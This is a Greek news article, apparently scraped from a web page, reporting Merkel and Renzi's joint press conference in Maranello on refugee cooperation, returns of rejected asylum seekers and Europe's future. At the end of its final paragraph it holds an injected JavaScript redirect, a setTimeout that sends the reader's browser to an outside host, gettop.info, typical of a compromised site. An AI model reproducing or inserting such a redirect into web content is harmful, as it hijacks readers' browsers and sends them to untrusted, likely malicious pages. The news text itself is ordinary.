Αναγκαία η συνεργασία στο προσφυγικό για Μέρκελ και Ρέντσι

0
10

 

Την ανάγκη συνεργασίας για την αντιμετώπιση του προσφυγικού τόνισαν σε κοινη συνέντευξη Τύπου, μετά την ολοκλήρωση της διμερούς ιταλογερμανικής συνόδου στο Μαρανέλο, ο Ιταλός πρωθυπουργός Ματέο Ρέντσι και η Γερμανίδα καγκελάριος Άνγκελα Μέρκελ.

Οι δύο ηγέτες επικεντρώθηκαν στην οικονομία, ατο μέλλον της Ευρώπης και στο προσφυγικό – μεταναστευτικό ζήτημα.

Από την πλευρά του ο Ματέο Ρέντσι τόνισε: «Η Γερμανία πέρυσι υποδέχθηκε ένα εκατομμύριο πρόσφυγες και αιτούντες άσυλο. Δηλαδή, δέκα φορές περισσότερους απ’ ό,τι η Ιταλία. Είναι σημαντικό να εργασθούμε μαζί, με προσήλωση στην αρχή του επαναπατρισμού όσων δεν δικαιούται τη χορήγηση ασύλου» ενώ προσέθεσε ότι «πρέπει να συνεχίσουν οι διαδώσεις ανθρώπινων ζωών».

Όσον αφορά στην Ευρώπη και την κρίση που αντιμετωπίζει σχολίασε: «Πρέπει να χρωματισθεί όλο και πιο ζωηρά το μέλλον της, με θάρρος, επενδύσεις και καινοτομίες». Δήλωσε, παράλληλα, ότι «με τη Γερμανία, κάποιες φορές οι απόψεις μας σε επιμέρους θέματα διαφέρουν, αλλά μας ενώνει η επίγνωση της αξίας της Ευρώπης».

Στη συνέχεια, η κυρία Μέρκελ ανακοίνωσε ότι η Γερμανία πρόκειται να συνεργαστεί με την Ιταλία για την ανοικοδόμηση ενός εκ των σχολείων που καταστράφηκαν στο Αματρίτσε από τον φονικό σεισμό ενώ σχετικά με την οικονομική ανάπτυξη επικεντρώθηκε στη σημασία της ψηφιακής τεχνολογίας και στη βιομηχανική παραγωγή.

Όσον αφορά στο καίριο θέμα του προσφυγικού σημείωσε: «Στο μεταναστευτικό συνεργαζόμαστε στενά. Όποιος δεν δικαιούται να μείνει στην Ευρώπη πρέπει να επαναπατρισθεί. Στη Μεσόγειο, στο Αιγαίο, έχασαν τη ζωή τους πολλά άτομα, και εμείς έχουμε χρέος να καταπολεμήσουμε την παρανομία και τους διακινητές» και υπογράμμισε: «Στο μεταναστευτικό πολλά έγιναν και πολλά πρέπει ακόμη να γίνουν».

Επίσης, συμφώνησε με τον κ. Ρέντσι ότι πρέπει να υπάρξει συνεργασία και να χορηγηθεί βοήθεια στις χώρες προέλευσης των μεταναστών. «Πρέπει να ελέγξουμε καλύτερα τα εξωτερικά σύνορα της Ένωσης, αλλά επιτελέσαμε ήδη ουσιαστική πρόοδο», τόνισε η καγκελάριος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here